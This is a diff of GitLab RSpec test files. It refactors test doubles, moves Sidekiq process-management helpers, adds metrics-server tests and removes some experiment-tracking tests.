diff options
Diffstat (limited to 'spec')
1318 files changed, 36040 insertions, 18387 deletions
diff --git a/spec/bin/feature_flag_spec.rb b/spec/bin/feature_flag_spec.rb index de0db8ba256..a85cafcb4a3 100644 --- a/spec/bin/feature_flag_spec.rb +++ b/spec/bin/feature_flag_spec.rb @@ -239,7 +239,7 @@ RSpec.describe 'bin/feature-flag' do end describe '.read_rollout_issue_url' do - let(:options) { OpenStruct.new(name: 'foo', type: :development) } + let(:options) { double('options', name: 'foo', type: :development) } let(:url) { 'https://issue' } it 'reads type from $stdin' do @@ -265,7 +265,7 @@ RSpec.describe 'bin/feature-flag' do end describe '.read_ee_only' do - let(:options) { OpenStruct.new(name: 'foo', type: :development) } + let(:options) { double('options', name: 'foo', type: :development) } it { expect(described_class.read_ee_only(options)).to eq(false) } end diff --git a/spec/channels/application_cable/connection_spec.rb b/spec/channels/application_cable/connection_spec.rb index 7d60548f780..c10e0c0cab4 100644 --- a/spec/channels/application_cable/connection_spec.rb +++ b/spec/channels/application_cable/connection_spec.rb @@ -2,12 +2,12 @@ require 'spec_helper' -RSpec.describe ApplicationCable::Connection, :clean_gitlab_redis_shared_state do +RSpec.describe ApplicationCable::Connection, :clean_gitlab_redis_sessions do let(:session_id) { Rack::Session::SessionId.new('6919a6f1bb119dd7396fadc38fd18d0d') } context 'when session cookie is set' do before do - Gitlab::Redis::SharedState.with do |redis| + Gitlab::Redis::Sessions.with do |redis| redis.set("session:gitlab:#{session_id.private_id}", Marshal.dump(session_hash)) end diff --git a/spec/commands/metrics_server/metrics_server_spec.rb b/spec/commands/metrics_server/metrics_server_spec.rb new file mode 100644 index 00000000000..f3936e6b346 --- /dev/null +++ b/spec/commands/metrics_server/metrics_server_spec.rb @@ -0,0 +1,73 @@ +# frozen_string_literal: true + +require 'spec_helper' + +require_relative '../../../metrics_server/metrics_server' + +# End-to-end tests for the metrics server process we use to 
serve metrics +# from forking applications (Sidekiq, Puma) to the Prometheus scraper. +RSpec.describe 'bin/metrics-server', :aggregate_failures do + let(:config_file) { Tempfile.new('gitlab.yml') } + let(:config) do + { + 'test' => { + 'monitoring' => { + 'sidekiq_exporter' => { + 'address' => 'localhost', + 'enabled' => true, + 'port' => 3807 + } + } + } + } + end + + context 'with a running server' do + before do + # We need to send a request to localhost + WebMock.allow_net_connect! + + config_file.write(YAML.dump(config)) + config_file.close + + env = { + 'GITLAB_CONFIG' => config_file.path, + 'METRICS_SERVER_TARGET' => 'sidekiq', + 'WIPE_METRICS_DIR' => '1' + } + @pid = Process.spawn(env, 'bin/metrics-server', pgroup: true) + end + + after do + webmock_enable! + + if @pid + pgrp = Process.getpgid(@pid) + + Timeout.timeout(5) do + Process.kill('TERM', -pgrp) + Process.waitpid(@pid) + end + + expect(Gitlab::ProcessManagement.process_alive?(@pid)).to be(false) + end + rescue Errno::ESRCH => _ + # 'No such process' means the process died before + ensure + config_file.unlink + end + + it 'serves /metrics endpoint' do + expect do + Timeout.timeout(5) do + http_ok = false + until http_ok + sleep 1 + response = Gitlab::HTTP.try_get("http://localhost:3807/metrics", allow_local_requests: true) + http_ok = response&.success? 
+ end + end + end.not_to raise_error + end + end +end diff --git a/spec/commands/sidekiq_cluster/cli_spec.rb b/spec/commands/sidekiq_cluster/cli_spec.rb index baa4a2b4ec3..148b8720740 100644 --- a/spec/commands/sidekiq_cluster/cli_spec.rb +++ b/spec/commands/sidekiq_cluster/cli_spec.rb @@ -12,8 +12,23 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath { env: 'test', directory: Dir.pwd, max_concurrency: 50, min_concurrency: 0, dryrun: false, timeout: timeout } end + let(:sidekiq_exporter_enabled) { false } + let(:sidekiq_exporter_port) { '3807' } + let(:sidekiq_health_checks_port) { '3807' } + before do stub_env('RAILS_ENV', 'test') + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: sidekiq_exporter_enabled, + port: sidekiq_exporter_port + }, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) end describe '#run' do @@ -241,12 +256,184 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath end end end + + context 'metrics server' do + let(:trapped_signals) { described_class::TERMINATE_SIGNALS + described_class::FORWARD_SIGNALS } + let(:metrics_dir) { Dir.mktmpdir } + + before do + stub_env('prometheus_multiproc_dir', metrics_dir) + end + + after do + FileUtils.rm_rf(metrics_dir, secure: true) + end + + context 'starting the server' do + context 'without --dryrun' do + context 'when there are no sidekiq_health_checks settings set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: true, + port: sidekiq_exporter_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + + it 'rescues Settingslogic::MissingSetting' do + expect { cli.run(%w(foo)) }.not_to raise_error(Settingslogic::MissingSetting) + 
end + end + + context 'when the sidekiq_exporter.port setting is not set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: { + enabled: true + }, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + + it 'rescues Settingslogic::MissingSetting' do + expect { cli.run(%w(foo)) }.not_to raise_error(Settingslogic::MissingSetting) + end + end + + context 'when sidekiq_exporter.enabled setting is not set' do + before do + stub_config( + monitoring: { + sidekiq_exporter: {}, + sidekiq_health_checks: { + port: sidekiq_health_checks_port + } + } + ) + + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + it 'does not start a sidekiq metrics server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo)) + end + end + + context 'with valid settings' do + using RSpec::Parameterized::TableSyntax + + where(:sidekiq_exporter_enabled, :sidekiq_exporter_port, :sidekiq_health_checks_port, :start_metrics_server) do + true | '3807' | '3907' | true + true | '3807' | '3807' | false + false | '3807' | '3907' | false + false | '3807' | '3907' | false + end + + with_them do + before do + allow(Gitlab::SidekiqCluster).to receive(:start) + allow(cli).to receive(:write_pid) + allow(cli).to receive(:trap_signals) + allow(cli).to receive(:start_loop) + end + + specify do + if start_metrics_server + expect(MetricsServer).to receive(:spawn).with('sidekiq', metrics_dir: metrics_dir, wipe_metrics_dir: true, trapped_signals: trapped_signals) + else + expect(MetricsServer).not_to receive(:spawn) + end + + cli.run(%w(foo)) + end + end + 
end + end + + context 'with --dryrun set' do + let(:sidekiq_exporter_enabled) { true } + + it 'does not start the server' do + expect(MetricsServer).not_to receive(:spawn) + + cli.run(%w(foo --dryrun)) + end + end + end + + context 'supervising the server' do + let(:sidekiq_exporter_enabled) { true } + let(:sidekiq_health_checks_port) { '3907' } + + before do + allow(cli).to receive(:sleep).with(a_kind_of(Numeric)) + allow(MetricsServer).to receive(:spawn).and_return(99) + cli.start_metrics_server + end + + it 'stops the metrics server when one of the processes has been terminated' do + allow(Gitlab::ProcessManagement).to receive(:process_died?).and_return(false) + allow(Gitlab::ProcessManagement).to receive(:all_alive?).with(an_instance_of(Array)).and_return(false) + allow(Gitlab::ProcessManagement).to receive(:signal_processes).with(an_instance_of(Array), :TERM) + + expect(Process).to receive(:kill).with(:TERM, 99) + + cli.start_loop + end + + it 'starts the metrics server when it is down' do + allow(Gitlab::ProcessManagement).to receive(:process_died?).and_return(true) + allow(Gitlab::ProcessManagement).to receive(:all_alive?).with(an_instance_of(Array)).and_return(false) + allow(cli).to receive(:stop_metrics_server) + + expect(MetricsServer).to receive(:spawn).with( + 'sidekiq', metrics_dir: metrics_dir, wipe_metrics_dir: false, trapped_signals: trapped_signals + ) + + cli.start_loop + end + end + end end describe '#write_pid' do context 'when a PID is specified' do it 'writes the PID to a file' do - expect(Gitlab::SidekiqCluster).to receive(:write_pid).with('/dev/null') + expect(Gitlab::ProcessManagement).to receive(:write_pid).with('/dev/null') cli.option_parser.parse!(%w(-P /dev/null)) cli.write_pid @@ -255,7 +442,7 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath context 'when no PID is specified' do it 'does not write a PID' do - expect(Gitlab::SidekiqCluster).not_to receive(:write_pid) + 
expect(Gitlab::ProcessManagement).not_to receive(:write_pid) cli.write_pid end @@ -264,13 +451,13 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath describe '#wait_for_termination' do it 'waits for termination of all sub-processes and succeeds after 3 checks' do - expect(Gitlab::SidekiqCluster).to receive(:any_alive?) + expect(Gitlab::ProcessManagement).to receive(:any_alive?) .with(an_instance_of(Array)).and_return(true, true, true, false) - expect(Gitlab::SidekiqCluster).to receive(:pids_alive) + expect(Gitlab::ProcessManagement).to receive(:pids_alive) .with([]).and_return([]) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with([], "-KILL") stub_const("Gitlab::SidekiqCluster::CHECK_TERMINATE_INTERVAL_SECONDS", 0.1) @@ -292,13 +479,13 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath .with([['foo']], default_options) .and_return(worker_pids) - expect(Gitlab::SidekiqCluster).to receive(:any_alive?) + expect(Gitlab::ProcessManagement).to receive(:any_alive?) 
.with(worker_pids).and_return(true).at_least(10).times - expect(Gitlab::SidekiqCluster).to receive(:pids_alive) + expect(Gitlab::ProcessManagement).to receive(:pids_alive) .with(worker_pids).and_return([102]) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with([102], "-KILL") cli.run(%w(foo)) @@ -312,9 +499,9 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath end describe '#trap_signals' do - it 'traps the termination and forwarding signals' do - expect(Gitlab::SidekiqCluster).to receive(:trap_terminate) - expect(Gitlab::SidekiqCluster).to receive(:trap_forward) + it 'traps termination and sidekiq specific signals' do + expect(Gitlab::ProcessManagement).to receive(:trap_signals).with(%i[INT TERM]) + expect(Gitlab::ProcessManagement).to receive(:trap_signals).with(%i[TTIN USR1 USR2 HUP]) cli.trap_signals end @@ -324,10 +511,10 @@ RSpec.describe Gitlab::SidekiqCluster::CLI do # rubocop:disable RSpec/FilePath it 'runs until one of the processes has been terminated' do allow(cli).to receive(:sleep).with(a_kind_of(Numeric)) - expect(Gitlab::SidekiqCluster).to receive(:all_alive?) + expect(Gitlab::ProcessManagement).to receive(:all_alive?) 
.with(an_instance_of(Array)).and_return(false) - expect(Gitlab::SidekiqCluster).to receive(:signal_processes) + expect(Gitlab::ProcessManagement).to receive(:signal_processes) .with(an_instance_of(Array), :TERM) cli.start_loop diff --git a/spec/config/mail_room_spec.rb b/spec/config/mail_room_spec.rb index 074549ff591..55f8fdd78ba 100644 --- a/spec/config/mail_room_spec.rb +++ b/spec/config/mail_room_spec.rb @@ -26,11 +26,11 @@ RSpec.describe 'mail_room.yml' do before do stub_env('GITLAB_REDIS_QUEUES_CONFIG_FILE', absolute_path(queues_config_path)) - clear_queues_raw_config + redis_clear_raw_config!(Gitlab::Redis::Queues) end after do - clear_queues_raw_config + redis_clear_raw_config!(Gitlab::Redis::Queues) end context 'when incoming email is disabled' do @@ -103,12 +103,6 @@ RSpec.describe 'mail_room.yml' do end end - def clear_queues_raw_config - Gitlab::Redis::Queues.remove_instance_variable(:@_raw_config) - rescue NameError - # raised if @_raw_config was not set; ignore - end - def absolute_path(path) Rails.root.join(path).to_s end diff --git a/spec/controllers/abuse_reports_controller_spec.rb b/spec/controllers/abuse_reports_controller_spec.rb index 3ef78226db0..11371108375 100644 --- a/spec/controllers/abuse_reports_controller_spec.rb +++ b/spec/controllers/abuse_reports_controller_spec.rb @@ -19,7 +19,7 @@ RSpec.describe AbuseReportsController do context 'when the user has already been deleted' do it 'redirects the reporter to root_path' do user_id = user.id - user.destroy + user.destroy! 
get :new, params: { user_id: user_id } diff --git a/spec/controllers/admin/clusters_controller_spec.rb b/spec/controllers/admin/clusters_controller_spec.rb index bd0c2965906..25c4830a79a 100644 --- a/spec/controllers/admin/clusters_controller_spec.rb +++ b/spec/controllers/admin/clusters_controller_spec.rb @@ -278,7 +278,8 @@ RSpec.describe Admin::ClustersController do end allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |instance| allow(instance).to receive(:projects_zones_clusters_create) do - OpenStruct.new( + double( + 'instance', self_link: 'projects/gcp-project-12345/zones/us-central1-a/operations/ope-123', status: 'RUNNING' ) diff --git a/spec/controllers/admin/integrations_controller_spec.rb b/spec/controllers/admin/integrations_controller_spec.rb index cf6a6385425..410bc0ddc1d 100644 --- a/spec/controllers/admin/integrations_controller_spec.rb +++ b/spec/controllers/admin/integrations_controller_spec.rb @@ -105,40 +105,4 @@ RSpec.describe Admin::IntegrationsController do .and change { Integrations::Jira.inherit_from_id(integration.id).count }.by(-1) end end - - describe '#overrides' do - let_it_be(:instance_integration) { create(:bugzilla_integration, :instance) } - let_it_be(:non_overridden_integration) { create(:bugzilla_integration, inherit_from_id: instance_integration.id) } - let_it_be(:overridden_integration) { create(:bugzilla_integration) } - let_it_be(:overridden_other_integration) { create(:confluence_integration) } - - subject do - get :overrides, params: { id: instance_integration.class.to_param }, format: format - end - - context 'when format is JSON' do - let(:format) { :json } - - include_context 'JSON response' - - it 'returns projects with overrides', :aggregate_failures do - subject - - expect(response).to have_gitlab_http_status(:ok) - expect(response).to include_pagination_headers - expect(json_response).to contain_exactly(a_hash_including('full_name' => overridden_integration.project.full_name)) - end - end - - context 'when 
format is HTML' do - let(:format) { :html } - - it 'renders template' do - subject - - expect(response).to render_template 'shared/integrations/overrides' - expect(assigns(:integration)).to eq(instance_integration) - end - end - end end diff --git a/spec/controllers/application_controller_spec.rb b/spec/controllers/application_controller_spec.rb index e623c1ab940..004bea02580 100644 --- a/spec/controllers/application_controller_spec.rb +++ b/spec/controllers/application_controller_spec.rb @@ -732,17 +732,8 @@ RSpec.describe ApplicationController do get :index - expect(response.headers['Cache-Control']).to eq 'private, no-store' expect(response.headers['Pragma']).to eq 'no-cache' end - - it 'does not set the "no-store" header for XHR requests' do - sign_in(user) - - get :index, xhr: true - - expect(response.headers['Cache-Control']).to eq 'max-age=0, private, must-revalidate' - end end end diff --git a/spec/controllers/boards/issues_controller_spec.rb b/spec/controllers/boards/issues_controller_spec.rb index b2200050e41..1fd249eba69 100644 --- a/spec/controllers/boards/issues_controller_spec.rb +++ b/spec/controllers/boards/issues_controller_spec.rb @@ -484,7 +484,7 @@ RSpec.describe Boards::IssuesController do context 'with guest user' do context 'in open list' do it 'returns a successful 200 response' do - open_list = board.lists.create(list_type: :backlog) + open_list = board.lists.create!(list_type: :backlog) create_issue user: guest, board: board, list: open_list, title: 'New issue' expect(response).to have_gitlab_http_status(:ok) diff --git a/spec/controllers/google_api/authorizations_controller_spec.rb b/spec/controllers/google_api/authorizations_controller_spec.rb index 3dd2cc307d5..3bf50f98791 100644 --- a/spec/controllers/google_api/authorizations_controller_spec.rb +++ b/spec/controllers/google_api/authorizations_controller_spec.rb @@ -88,5 +88,26 @@ RSpec.describe GoogleApi::AuthorizationsController do it_behaves_like 'access denied' end + + context 
'user logs in but declines authorizations' do + subject { get :callback, params: { error: 'xxx', state: state } } + + let(:session_key) { 'session-key' } + let(:redirect_uri) { 'example.com' } + let(:error_uri) { 'error.com' } + let(:state) { session_key } + + before do + session[GoogleApi::CloudPlatform::Client.session_key_for_redirect_uri(session_key)] = redirect_uri + session[:error_uri] = error_uri + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |instance| + allow(instance).to receive(:get_token).and_return([token, expires_at]) + end + end + + it 'redirects to error uri' do + expect(subject).to redirect_to(error_uri) + end + end end end diff --git a/spec/controllers/graphql_controller_spec.rb b/spec/controllers/graphql_controller_spec.rb index f9b15c9a48e..578ce04721c 100644 --- a/spec/controllers/graphql_controller_spec.rb +++ b/spec/controllers/graphql_controller_spec.rb @@ -262,5 +262,16 @@ RSpec.describe GraphqlController do expect(controller).to have_received(:append_info_to_payload) expect(log_payload.dig(:metadata, :graphql)).to match_array(expected_logs) end + + it 'appends the exception in case of errors' do + exception = StandardError.new('boom') + + expect(controller).to receive(:execute).and_raise(exception) + + post :execute, params: { _json: graphql_queries } + + expect(controller).to have_received(:append_info_to_payload) + expect(log_payload.dig(:exception_object)).to eq(exception) + end end end diff --git a/spec/controllers/groups/dependency_proxies_controller_spec.rb b/spec/controllers/groups/dependency_proxies_controller_spec.rb index 35bd7d47aed..67847936a80 100644 --- a/spec/controllers/groups/dependency_proxies_controller_spec.rb +++ b/spec/controllers/groups/dependency_proxies_controller_spec.rb @@ -3,8 +3,9 @@ require 'spec_helper' RSpec.describe Groups::DependencyProxiesController do - let(:group) { create(:group) } - let(:user) { create(:user) } + let_it_be(:group) { create(:group) } + 
let_it_be_with_reload(:dependency_proxy_group_setting) { create(:dependency_proxy_group_setting, group: group) } + let_it_be(:user) { create(:user) } before do group.add_owner(user) @@ -12,62 +13,37 @@ RSpec.describe Groups::DependencyProxiesController do end describe 'GET #show' do - context 'feature enabled' do - before do - enable_dependency_proxy - end - - it 'returns 200 and renders the view' do - get :show, params: { group_id: group.to_param } + subject { get :show, params: { group_id: group.to_param } } - expect(response).to have_gitlab_http_status(:ok) - expect(response).to render_template('groups/dependency_proxies/show') - end + before do + stub_config(dependency_proxy: { enabled: config_enabled }) end - it 'returns 404 when feature is disabled' do - disable_dependency_proxy + context 'with global config enabled' do + let(:config_enabled) { true } - get :show, params: { group_id: group.to_param } + context 'with the setting enabled' do + it 'returns 200 and renders the view' do + subject - expect(response).to have_gitlab_http_status(:not_found) - end - end - - describe 'PUT #update' do - context 'feature enabled' do - before do - enable_dependency_proxy + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template('groups/dependency_proxies/show') + end end - it 'redirects back to show page' do - put :update, params: update_params + context 'with the setting disabled' do + before do + dependency_proxy_group_setting.update!(enabled: false) + end - expect(response).to have_gitlab_http_status(:found) + it_behaves_like 'returning response status', :not_found end end - it 'returns 404 when feature is disabled' do - put :update, params: update_params + context 'with global config disabled' do + let(:config_enabled) { false } - expect(response).to have_gitlab_http_status(:not_found) + it_behaves_like 'returning response status', :not_found end - - def update_params - { - group_id: group.to_param, - dependency_proxy_group_setting: { 
enabled: true } - } - end - end - - def enable_dependency_proxy - stub_config(dependency_proxy: { enabled: true }) - - group.create_dependency_proxy_setting!(enabled: true) - end - - def disable_dependency_proxy - group.create_dependency_proxy_setting!(enabled: false) end end diff --git a/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb b/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb index b22307578ab..0f262d93d4c 100644 --- a/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb +++ b/spec/controllers/groups/dependency_proxy_for_containers_controller_spec.rb @@ -170,7 +170,7 @@ RSpec.describe Groups::DependencyProxyForContainersController do let(:pull_response) { { status: :success, manifest: manifest, from_cache: false } } before do - allow_next_instance_of(DependencyProxy::FindOrCreateManifestService) do |instance| + allow_next_instance_of(DependencyProxy::FindCachedManifestService) do |instance| allow(instance).to receive(:execute).and_return(pull_response) end end diff --git a/spec/controllers/groups/group_members_controller_spec.rb b/spec/controllers/groups/group_members_controller_spec.rb index 4b17326de09..04a9b9f5250 100644 --- a/spec/controllers/groups/group_members_controller_spec.rb +++ b/spec/controllers/groups/group_members_controller_spec.rb @@ -293,7 +293,6 @@ RSpec.describe Groups::GroupMembersController do context 'when `expires_at` is set' do it 'returns correct json response' do expect(json_response).to eq({ - "expires_in" => "about 1 month", "expires_soon" => false, "expires_at_formatted" => expiry_date.to_time.in_time_zone.to_s(:medium) }) diff --git a/spec/controllers/groups_controller_spec.rb b/spec/controllers/groups_controller_spec.rb index 2525146c673..a7625e65603 100644 --- a/spec/controllers/groups_controller_spec.rb +++ b/spec/controllers/groups_controller_spec.rb @@ -82,16 +82,6 @@ RSpec.describe GroupsController, factory_default: :keep do expect(subject).to 
redirect_to group_import_path(group) end end - - context 'publishing the invite_members_for_task experiment' do - it 'publishes the experiment data to the client' do - wrapped_experiment(experiment(:invite_members_for_task)) do |e| - expect(e).to receive(:publish_to_client) - end - - get :show, params: { id: group.to_param, open_modal: 'invite_members_for_task' }, format: format - end - end end describe 'GET #details' do diff --git a/spec/controllers/import/bulk_imports_controller_spec.rb b/spec/controllers/import/bulk_imports_controller_spec.rb index 3adba32c74a..a7089005abf 100644 --- a/spec/controllers/import/bulk_imports_controller_spec.rb +++ b/spec/controllers/import/bulk_imports_controller_spec.rb @@ -215,9 +215,13 @@ RSpec.describe Import::BulkImportsController do let(:pat) { "fake-pat" } let(:bulk_import_params) do [{ "source_type" => "group_entity", - "source_full_path" => "full_path", - "destination_name" => "destination_name", - "destination_namespace" => "root" }] + "source_full_path" => "full_path", + "destination_name" => "destination_name", + "destination_namespace" => "root" }, + { "source_type" => "group_entity2", + "source_full_path" => "full_path2", + "destination_name" => "destination_name2", + "destination_namespace" => "root" }] end before do @@ -225,29 +229,23 @@ RSpec.describe Import::BulkImportsController do session[:bulk_import_gitlab_url] = instance_url end - it 'executes BulkImpors::CreatetService' do + it 'executes BulkImpors::CreateService' do + error_response = ServiceResponse.error(message: 'Record invalid', http_status: :unprocessable_entity) + expect_next_instance_of( - ::BulkImports::CreateService, user, bulk_import_params, { url: instance_url, access_token: pat }) do |service| + ::BulkImports::CreateService, user, bulk_import_params[0], { url: instance_url, access_token: pat }) do |service| allow(service).to receive(:execute).and_return(ServiceResponse.success(payload: bulk_import)) end - - post :create, params: { bulk_import: 
bulk_import_params } - - expect(response).to have_gitlab_http_status(:ok) - expect(response.body).to eq({ id: bulk_import.id }.to_json) - end - - it 'returns error when validation fails' do - error_response = ServiceResponse.error(message: 'Record invalid', http_status: :unprocessable_entity) expect_next_instance_of( - ::BulkImports::CreateService, user, bulk_import_params, { url: instance_url, access_token: pat }) do |service| + ::BulkImports::CreateService, user, bulk_import_params[1], { url: instance_url, access_token: pat }) do |service| allow(service).to receive(:execute).and_return(error_response) end post :create, params: { bulk_import: bulk_import_params } - expect(response).to have_gitlab_http_status(:unprocessable_entity) - expect(response.body).to eq({ error: 'Record invalid' }.to_json) + expect(response).to have_gitlab_http_status(:ok) + expect(json_response).to eq([{ "success" => true, "id" => bulk_import.id, "message" => nil }, + { "success" => false, "id" => nil, "message" => "Record invalid" }]) end end end diff --git a/spec/controllers/import/fogbugz_controller_spec.rb b/spec/controllers/import/fogbugz_controller_spec.rb index 376c089df78..d351e1cc3f3 100644 --- a/spec/controllers/import/fogbugz_controller_spec.rb +++ b/spec/controllers/import/fogbugz_controller_spec.rb @@ -79,15 +79,18 @@ RSpec.describe Import::FogbugzController do end describe 'GET status' do + let(:repo) do + instance_double(Gitlab::FogbugzImport::Repository, + id: 'demo', name: 'vim', safe_name: 'vim', path: 'vim') + end + before do - @repo = OpenStruct.new(id: 'demo', name: 'vim') stub_client(valid?: true) end it_behaves_like 'import controller status' do - let(:repo) { @repo } - let(:repo_id) { @repo.id } - let(:import_source) { @repo.name } + let(:repo_id) { repo.id } + let(:import_source) { repo.name } let(:provider_name) { 'fogbugz' } let(:client_repos_field) { :repos } end diff --git a/spec/controllers/invites_controller_spec.rb 
b/spec/controllers/invites_controller_spec.rb index d4091461062..c5e693e3489 100644 --- a/spec/controllers/invites_controller_spec.rb +++ b/spec/controllers/invites_controller_spec.rb @@ -97,52 +97,6 @@ RSpec.describe InvitesController do ) end - context 'when it is part of the invite_email_preview_text experiment' do - let(:extra_params) { { invite_type: 'initial_email', experiment_name: 'invite_email_preview_text' } } - - it 'tracks the initial join click from email' do - experiment = double(track: true) - allow(controller).to receive(:experiment).with(:invite_email_preview_text, actor: member).and_return(experiment) - - request - - expect(experiment).to have_received(:track).with(:join_clicked) - end - - context 'when member does not exist' do - let(:raw_invite_token) { '_bogus_token_' } - - it 'does not track the experiment' do - expect(controller).not_to receive(:experiment).with(:invite_email_preview_text, actor: member) - - request - end - end - end - - context 'when it is part of the invite_email_from experiment' do - let(:extra_params) { { invite_type: 'initial_email', experiment_name: 'invite_email_from' } } - - it 'tracks the initial join click from email' do - experiment = double(track: true) - allow(controller).to receive(:experiment).with(:invite_email_from, actor: member).and_return(experiment) - - request - - expect(experiment).to have_received(:track).with(:join_clicked) - end - - context 'when member does not exist' do - let(:raw_invite_token) { '_bogus_token_' } - - it 'does not track the experiment' do - expect(controller).not_to receive(:experiment).with(:invite_email_from, actor: member) - - request - end - end - end - context 'when member does not exist' do let(:raw_invite_token) { '_bogus_token_' } @@ -168,15 +122,6 @@ RSpec.describe InvitesController do label: 'invite_email' ) end - - context 'when it is not part of our invite email experiment' do - it 'does not track via experiment', :aggregate_failures do - expect(controller).not_to 
receive(:experiment).with(:invite_email_preview_text, actor: member) - expect(controller).not_to receive(:experiment).with(:invite_email_from, actor: member) - - request - end - end end context 'when not logged in' do diff --git a/spec/controllers/omniauth_callbacks_controller_spec.rb b/spec/controllers/omniauth_callbacks_controller_spec.rb index 8c8de2f79a3..e70b8af2068 100644 --- a/spec/controllers/omniauth_callbacks_controller_spec.rb +++ b/spec/controllers/omniauth_callbacks_controller_spec.rb @@ -479,6 +479,19 @@ RSpec.describe OmniauthCallbacksController, type: :controller do post :saml, params: { SAMLResponse: mock_saml_response } end end + + context 'with a blocked user trying to log in when there are hooks set up' do + let(:user) { create(:omniauth_user, extern_uid: 'my-uid', provider: 'saml') } + + subject(:post_action) { post :saml, params: { SAMLResponse: mock_saml_response } } + + before do + create(:system_hook) + user.block! + end + + it { expect { post_action }.not_to raise_error } + end end describe 'enable admin mode' do diff --git a/spec/controllers/profiles/emails_controller_spec.rb b/spec/controllers/profiles/emails_controller_spec.rb index ce16632472f..214a893f0fa 100644 --- a/spec/controllers/profiles/emails_controller_spec.rb +++ b/spec/controllers/profiles/emails_controller_spec.rb @@ -33,7 +33,7 @@ RSpec.describe Profiles::EmailsController do subject expect(response).to have_gitlab_http_status(:redirect) - expect(flash[:alert]).to eq(_('This action has been performed too many times. Try again later.')) + expect(flash[:alert]).to eq(_('This endpoint has been requested too many times. 
Try again later.')) end end end diff --git a/spec/controllers/projects/issues_controller_spec.rb b/spec/controllers/projects/issues_controller_spec.rb index 68cccfa8bde..763c3e43e27 100644 --- a/spec/controllers/projects/issues_controller_spec.rb +++ b/spec/controllers/projects/issues_controller_spec.rb @@ -201,32 +201,6 @@ RSpec.describe Projects::IssuesController do expect(response).to have_gitlab_http_status(:ok) expect(json_response['issue_email_participants']).to contain_exactly({ "email" => participants[0].email }, { "email" => participants[1].email }) end - - context 'with the invite_members_in_comment experiment', :experiment do - context 'when user can invite' do - before do - stub_experiments(invite_members_in_comment: :invite_member_link) - project.add_maintainer(user) - end - - it 'assigns the candidate experience and tracks the event' do - expect(experiment(:invite_members_in_comment)).to track(:view, property: project.root_ancestor.id.to_s) - .for(:invite_member_link) - .with_context(namespace: project.root_ancestor) - .on_next_instance - - get :show, params: { namespace_id: project.namespace, project_id: project, id: issue.iid } - end - end - - context 'when user can not invite' do - it 'does not track the event' do - expect(experiment(:invite_members_in_comment)).not_to track(:view) - - get :show, params: { namespace_id: project.namespace, project_id: project, id: issue.iid } - end - end - end end describe 'GET #new' do @@ -1197,6 +1171,15 @@ RSpec.describe Projects::IssuesController do end end + context 'when trying to create a task' do + it 'defaults to issue type' do + issue = post_new_issue(issue_type: 'task') + + expect(issue.issue_type).to eq('issue') + expect(issue.work_item_type.base_type).to eq('issue') + end + end + it 'creates the issue successfully', :aggregate_failures do issue = post_new_issue diff --git a/spec/controllers/projects/learn_gitlab_controller_spec.rb b/spec/controllers/projects/learn_gitlab_controller_spec.rb index 
620982f73be..2d00fcbccf3 100644 --- a/spec/controllers/projects/learn_gitlab_controller_spec.rb +++ b/spec/controllers/projects/learn_gitlab_controller_spec.rb @@ -5,14 +5,15 @@ require 'spec_helper' RSpec.describe Projects::LearnGitlabController do describe 'GET #index' do let_it_be(:user) { create(:user) } - let_it_be(:project) { create(:project, namespace: user.namespace) } + let_it_be(:project) { create(:project, namespace: create(:group)) } let(:learn_gitlab_enabled) { true } let(:params) { { namespace_id: project.namespace.to_param, project_id: project } } - subject { get :index, params: params } + subject(:action) { get :index, params: params } before do + project.namespace.add_owner(user) allow(controller.helpers).to receive(:learn_gitlab_enabled?).and_return(learn_gitlab_enabled) end @@ -32,6 +33,10 @@ RSpec.describe Projects::LearnGitlabController do it { is_expected.to have_gitlab_http_status(:not_found) } end + + it_behaves_like 'tracks assignment and records the subject', :invite_for_help_continuous_onboarding, :namespace do + subject { project.namespace } + end end end end diff --git a/spec/controllers/projects/merge_requests/diffs_controller_spec.rb b/spec/controllers/projects/merge_requests/diffs_controller_spec.rb index 5b1c6777523..f7370a1a1ac 100644 --- a/spec/controllers/projects/merge_requests/diffs_controller_spec.rb +++ b/spec/controllers/projects/merge_requests/diffs_controller_spec.rb @@ -496,6 +496,7 @@ RSpec.describe Projects::MergeRequests::DiffsController do { environment: nil, merge_request: merge_request, + commit: nil, diff_view: :inline, merge_ref_head_diff: nil, allow_tree_conflicts: true, @@ -552,7 +553,7 @@ RSpec.describe Projects::MergeRequests::DiffsController do it_behaves_like 'serializes diffs with expected arguments' do let(:collection) { Gitlab::Diff::FileCollection::Commit } - 